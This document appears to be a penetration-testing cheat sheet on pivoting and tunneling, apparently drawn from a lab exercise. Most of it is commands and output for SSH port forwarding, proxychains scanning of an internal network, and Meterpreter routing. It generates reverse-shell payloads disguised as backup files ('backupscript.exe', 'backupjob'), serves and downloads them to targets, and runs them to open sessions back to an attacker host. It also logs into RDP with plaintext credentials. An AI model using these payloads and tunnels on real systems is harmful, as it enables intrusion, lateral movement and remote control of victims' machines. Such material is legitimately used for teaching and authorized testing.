Port Forwarding

SSH Local Port Forwarding

Scan the Pivot Host

Identifies open ports on the pivot host to confirm accessible services like SSH.

C:\mrci0x1> nmap -sT -p22,3306 10.129.202.64

Starting Nmap 7.92 (https://nmap.org) at 2022-02-24 12:12 EST
Nmap scan report for 10.129.202.64
Host is up (0.12s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
3306/tcp closed mysql

Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds

Set Up Local Port Forwarding

Maps local port 9999 to MySQL on the pivot host for direct access.

C:\mrci0x1> ssh -L 9999:localhost:3306 tobias@10.129.202.64

Verify the Forward

Checks if local port 9999 is listening and accessible.

C:\mrci0x1> netstat -antp | grep 9999

tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      4034/ssh
tcp6       0      0 ::1:9999                :::*                    LISTEN      4034/ssh

Scans local port 9999 to confirm MySQL service availability.

C:\mrci0x1> nmap -v -sV -p9999 localhost

PORT     STATE SERVICE VERSION
9999/tcp open  mysql   MySQL 8.0.28-0ubuntu0.20.04.3
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds

Forward Multiple Ports

Maps additional ports (e.g., 8080 to Apache) for multiple service access.

C:\mrci0x1> ssh -L 9999:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

Dynamic Port Forwarding with SOCKS Proxy

Inspect the Pivot Host

Verifies network interfaces on the pivot host to identify internal network access.

C:\pivot_host> ifconfig

ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.202.64  netmask 255.255.0.0  broadcast 10.129.255.255

ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.5.129  netmask 255.255.254.0  broadcast 172.16.5.255

Set Up Dynamic Port Forwarding

Creates a SOCKS proxy on port 9050 to route traffic through the pivot host.

C:\mrci0x1> ssh -D 9050 ubuntu@10.129.202.64

Configure Proxychains

Displays proxychains configuration to ensure SOCKS proxy settings are correct.

C:\mrci0x1> tail -r -n 4 /etc/proxychains.conf

# defaults set to "tor"
socks4  127.0.0.1 9050

Scan the Internal Network

Performs a ping scan on a range to discover live hosts via the SOCKS proxy.

C:\mrci0x1> proxychains nmap -v -sn 172.16.5.1-20

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 (https://nmap.org) at 2022-02-24 12:30 EST
Initiating Ping Scan at 12:30
Scanning 10 hosts [2 ports/host]

Scans a specific host for open ports, bypassing host discovery.

C:\mrci0x1> proxychains nmap -v -Pn -sT 172.16.5.19

ProxyChains-3.1 (http://proxychains.sf.net)
Discovered open port 445/tcp on 172.16.5.19
Discovered open port 135/tcp on 172.16.5.19
Discovered open port 3389/tcp on 172.16.5.19

Pivoting with Metasploit

Start Metasploit with Proxychains

Launches Metasploit through proxychains to route traffic via the SOCKS proxy.

C:\mrci0x1> proxychains msfconsole

Use the RDP Scanner Module

Selects the RDP scanner module to check for RDP services.

C:\mrci0x1> use auxiliary/scanner/rdp/rdp_scanner

Sets the target host for the RDP scan.

C:\mrci0x1> set rhosts 172.16.5.19

Executes the RDP scan to confirm service availability.

C:\mrci0x1> run

[*] 172.16.5.19:3389 - Detected RDP on 172.16.5.19:3389 (name:DC01) (os_version:10.0.17763)
[*] Scanned 1 of 1 hosts (100% complete)

Accessing Services via Pivoting

Connects to an RDP service on the internal host using proxychains.

C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

ProxyChains-3.1 (http://proxychains.sf.net)
[13:02:42:481] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[13:02:42:482] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr

Remote Port Forwarding

Create a Meterpreter Payload

Generates a Windows payload to connect back to the pivot host’s internal IP.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 712 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

Configure the Metasploit Listener

Selects the multi-handler module to catch the reverse connection.

C:\mrci0x1> use exploit/multi/handler

Sets the payload type for the reverse HTTPS connection.

C:\mrci0x1> set payload windows/x64/meterpreter/reverse_https

payload => windows/x64/meterpreter/reverse_https

Configures the listener to bind on all interfaces.

C:\mrci0x1> set lhost 0.0.0.0

lhost => 0.0.0.0

Sets the listener port to 8000.

C:\mrci0x1> set lport 8000

lport => 8000

Starts the listener to wait for the reverse connection.

C:\mrci0x1> run

[*] Started HTTPS reverse handler on https://0.0.0.0:8000

Transfer the Payload to the Pivot Host

Copies the payload to the pivot host for further distribution.

C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/

backupscript.exe                                   100% 7168    65.4KB/s   00:00

Host the Payload on the Pivot Host

Starts an HTTP server on the pivot host to serve the payload.

C:\pivot_host> python3 -m http.server 8123

Download the Payload to the Windows Host

Downloads the payload from the pivot host to the Windows target.

C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Set Up Remote Port Forwarding

Forwards connections from the pivot host’s port 8080 to the attack host’s port 8000.

C:\mrci0x1> ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN

debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61355
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=5
debug1: channel 1: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: free: 172.16.5.19, nchannels 2
debug1: channel 1: connected to 0.0.0.0 port 8000
debug1: channel 1: free: 172.16.5.19, nchannels 1
debug1: client_input_channel_open: ctype forwarded-tcpip rchan 2 win 2097152 max 32768
debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61356
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000

Meterpreter Tunneling

Establishing a Meterpreter Session on the Pivot Host

Create a Meterpreter Payload

Generates a Linux payload for establishing a Meterpreter session on the pivot host.

C:\mrci0x1> msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: backupjob

Configure the Metasploit Listener

Selects the multi-handler for the Linux Meterpreter payload.

C:\mrci0x1> use exploit/multi/handler

Sets the listener to bind on all interfaces.

C:\mrci0x1> set lhost 0.0.0.0

lhost => 0.0.0.0

Sets the listener port to 8080.

C:\mrci0x1> set lport 8080

lport => 8080

Configures the payload type for the Linux reverse TCP connection.

C:\mrci0x1> set payload linux/x64/meterpreter/reverse_tcp

payload => linux/x64/meterpreter/reverse_tcp

Starts the listener for the Linux payload.

C:\mrci0x1> run

[*] Started reverse TCP handler on 0.0.0.0:8080

Transfer and Execute the Payload

Copies the Linux payload to the pivot host.

C:\mrci0x1> scp backupjob ubuntu@10.129.202.64:~/

Makes the payload executable on the pivot host.

C:\pivot_host> chmod +x backupjob

Executes the payload to establish a Meterpreter session.

C:\pivot_host> ./backupjob

[*] Sending stage (3020772 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:8080 -> 10.129.202.64:39826 ) at 2022-03-03 12:27:43 -0500
meterpreter > pwd
/home/ubuntu

Network Enumeration with Meterpreter

Ping Sweep

Runs a ping sweep to discover live hosts in the internal network.

C:\mrci0x1> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

[*] Performing ping sweep for IP range 172.16.5.0/23

Alternative Ping Sweep Methods

Uses a bash loop for ping sweep if ICMP is blocked (Linux pivot).

C:\pivot_host> for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Uses CMD for ping sweep if ICMP is blocked (Windows pivot).

C:\windows> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Uses PowerShell for ping sweep if ICMP is blocked (Windows pivot).

C:\windows> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

Configuring a SOCKS Proxy for Scanning

Set Up the SOCKS Proxy

Selects the SOCKS proxy module in Metasploit.

C:\mrci0x1> use auxiliary/server/socks_proxy

Sets the SOCKS proxy port to 9050.

C:\mrci0x1> set SRVPORT 9050

SRVPORT => 9050

Configures the SOCKS proxy to bind on all interfaces.

C:\mrci0x1> set SRVHOST 0.0.0.0

SRVHOST => 0.0.0.0

Sets the SOCKS version to 4a for compatibility.

C:\mrci0x1> set version 4a

version => 4a

Starts the SOCKS proxy server.

C:\mrci0x1> run

[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server

Lists running jobs to verify the SOCKS proxy.

C:\mrci0x1> jobs

Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

Configure Proxychains

Appends SOCKS proxy settings to proxychains.conf.

C:\mrci0x1> echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf

Add Routes with AutoRoute

Selects the autoroute module to route traffic.

C:\mrci0x1> use post/multi/manage/autoroute

Sets the Meterpreter session ID for routing.

C:\mrci0x1> set SESSION 1

SESSION => 1

Specifies the subnet for routing.

C:\mrci0x1> set SUBNET 172.16.5.0

SUBNET => 172.16.5.0

Executes the autoroute module to add routes.

C:\mrci0x1> run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed

Adds a route directly from the Meterpreter session.

C:\mrci0x1> run autoroute -s 172.16.5.0/23

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes

Displays active routes to verify configuration.

C:\mrci0x1> run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1

Scan with Nmap

Scans the target host for RDP using proxychains and Nmap.

C:\mrci0x1> proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

ProxyChains-3.1 (http://proxychains.sf.net)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-03 13:40 EST
Initiating Parallel DNS resolution of 1 host. at 13:40
Completed Parallel DNS resolution of 1 host. at 13:40, 0.12s elapsed
Initiating Connect Scan at 13:40
Scanning 172.16.5.19 [1 port]
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19 :3389-<><>-OK
Discovered open port 3389/tcp on 172.16.5.19
Completed Connect Scan at 13:40, 0.12s elapsed (1 total ports)
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds

Meterpreter Port Forwarding

Local Port Forwarding

Forwards local port 3300 to RDP on the target host.

C:\mrci0x1> portfwd add -l 3300 -p 3389 -r 172.16.5.19

[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389

Connects to the forwarded RDP service locally.

C:\mrci0x1> xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Verifies the local port forwarding connection.

C:\mrci0x1> netstat -antp

tcp        0      0 127.0.0.1:54652         127.0.0.1:3300          ESTABLISHED 4075/xfreerdp

Reverse Port Forwarding

Sets up reverse port forwarding for a reverse shell.

C:\mrci0x1> portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234

Selects the multi-handler for the reverse shell.

C:\mrci0x1> use exploit/multi/handler

Sets the payload for the Windows reverse TCP connection.

C:\mrci0x1> set payload windows/x64/meterpreter/reverse_tcp

Configures the listener to bind on all interfaces.

C:\mrci0x1> set LHOST 0.0.0.0

Sets the listener port to 8081.

C:\mrci0x1> set LPORT 8081

Starts the listener for the reverse shell.

C:\mrci0x1> run

Generates a Windows payload for the reverse shell.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

PreviousPivoting, Tunneling, and Port Forwarding NextSocat

Last updated 1 month ago